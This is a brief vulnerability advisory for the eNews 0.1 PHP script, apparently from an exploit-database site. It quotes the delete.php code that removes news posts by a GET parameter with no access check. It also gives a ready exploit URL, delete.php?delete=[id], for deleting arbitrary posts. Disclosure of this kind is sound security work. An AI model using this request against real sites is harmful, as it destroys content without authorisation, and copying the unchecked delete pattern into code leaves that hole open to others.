eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability Author: iLker Kandemir [MEFISTO] Script download : http://www.hotscripts.com/Detailed/81086.html script demo : http://emvvy.com/demos/enews/ site : www.dumenci.net ---------------------------------------------------------------- //poc: if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) { $deleteSQL = sprintf("DELETE FROM news WHERE id=%s", GetSQLValueString($_GET['delete'], "int")); ---------------------------------------------------------------- //exploit : http://[site]/delete.php?delete=[eNews_id] ---------------------------------------------------------------- tnx : aLL my FriEndZ
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论